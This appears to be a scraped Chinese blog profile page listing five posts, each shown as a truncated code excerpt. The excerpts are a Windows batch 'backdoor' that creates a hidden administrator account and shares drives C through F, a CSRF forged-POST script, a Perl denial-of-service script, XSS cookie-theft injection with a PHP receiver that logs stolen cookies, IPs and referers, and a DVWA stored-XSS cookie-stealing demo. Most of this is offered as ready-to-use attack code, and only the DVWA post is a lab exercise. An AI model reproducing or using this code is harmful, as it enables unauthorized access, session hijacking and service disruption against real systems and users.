自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(5)
  • 资源 (1)
  • 收藏
  • 关注

原创 代码篇——————windows后门代码

@echo off     @net user zzunble zzunble.net /add@net localgroup administrators zzunble /add@net share c$=c:@net share d$=d:@net share e$=e:@net share f$=f:@echo 3>c:\windows\system32\t1.

2017-03-21 12:33:38 989

原创 CSRF攻击代码

This page forges an HTTP POST request.      function post(url,fields)  {  //create a element.  var p = document.createElement("form");  //construct the form  p.action = url;  p.inne

2017-03-13 17:47:43 862

转载 利用perl脚本执行拒绝攻击的代码

#!/usr/bin/perl -wuse strict;use IO::Socket::INET;use IO::Socket::SSL;use Getopt::Long;use Config;$SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errorsprint CCCCCCCCCCOOCCOOOOO88

2017-03-13 10:40:08 1939

原创 接收cookie代码与注入盗取cookie代码参考

document.write('');alert(/XSS/)$cookie = $_GET['cookie']; //以GET方式获取cookie变量值$ip = getenv ('REMOTE_ADDR'); //远程主机IP地址$time=date('Y-m-d g:i:s'); //以“年-月-日 时:分:秒”的格式显示时间$referer=

2017-03-13 10:34:53 2117

原创 实例演示——————简单演示XSS store攻击,便于学习理解XSS store

此次演示环境是DVWA,将盗取cookie代码存储于服务端,受害者点击链接激活盗取cookie代码从而盗取受害者cookie,实施入侵。一,环境搭建     1,将DVWA环境搭建在192.168.98.168主机上,并确定该环境能正常使用。     2,准备盗取cookie代码。(该步骤在实际攻击中要善于伪装、诱使受害者点击。可写于留言板也可存储在第三方服务器将第三方url诱使受害者

2017-03-09 11:16:41 2275

py打包exe工具.rar

打包成.exe,命令简单粗暴,不论男女老少、小孩中老年,都可以简单实现,只需要windows自带cmd命令即可

2020-09-07

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除